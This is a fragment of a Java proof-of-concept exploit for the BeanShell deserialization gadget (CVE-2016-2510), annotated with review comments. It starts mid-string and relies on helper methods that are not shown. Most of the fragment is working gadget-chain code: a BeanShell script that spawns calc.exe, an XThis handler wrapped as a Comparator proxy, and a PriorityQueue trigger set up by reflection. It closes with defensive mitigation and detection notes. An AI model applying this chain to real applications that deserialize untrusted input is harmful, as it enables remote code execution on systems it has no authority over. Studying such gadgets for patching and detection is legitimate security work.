// Listing starts mid-statement: the literal below is the tail of a longer string expression whose
// beginning is not shown. NOTE(review): presumably it is the BeanShell script later passed to
// i.eval(payload) — confirm against the full listing.
// The visible script text starts a process (calc.exe, the demo command of this proof of concept)
// and returns 1; the trailing `}` closes a script block opened in the part that is not shown.
"new java.lang.ProcessBuilder(new String[]{\"calc.exe\"}).start();return 1;}";

// Create BeanShell Interpreter and evaluate the script in it. The interpreter's namespace
// (i.getNameSpace()) is what gets handed to XThis below.
Interpreter i = new Interpreter();
i.eval(payload);

// Create Proxy/InvocationHandler to be a "Comparator" using Interpreter.
// XThis is built over the interpreter and its namespace; its "invocationHandler" field is read
// through the getField(...) helper, which is defined outside this listing (presumably reflective
// access to a non-public field — confirm).
XThis xt = new XThis(i.getNameSpace(), i);
InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt);
// Dynamic proxy that implements Comparator and forwards every call on it to the BeanShell handler.
Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class<?>[]{Comparator.class}, handler);

// Prepare Trigger Gadget (will call Comparator.compare() during deserialization).
// The backing array and the size are written with setFieldValue(...) (helper defined outside this
// listing) rather than through the queue's public API.
// NOTE(review): presumably so that the comparator is not invoked while the object is being built — confirm.
PriorityQueue<Object> priorityQueue = new PriorityQueue<>(2, comparator);
Object[] queue = new Object[] {1,1};
setFieldValue(priorityQueue, "queue", queue);
setFieldValue(priorityQueue, "size", 2);

// Defender's view: the chain only matters where an application deserializes untrusted bytes with
// these BeanShell classes on its classpath. Mitigations: do not run Java native deserialization
// on untrusted input; where it cannot be avoided, restrict the accepted classes with an allow-list
// java.io.ObjectInputFilter; update BeanShell to a release that contains the CVE-2016-2510 fix.
// For detection, a JVM that spawns unexpected child processes is worth alerting on.

// RCE gadget in BeanShell (CVE-2016-2510)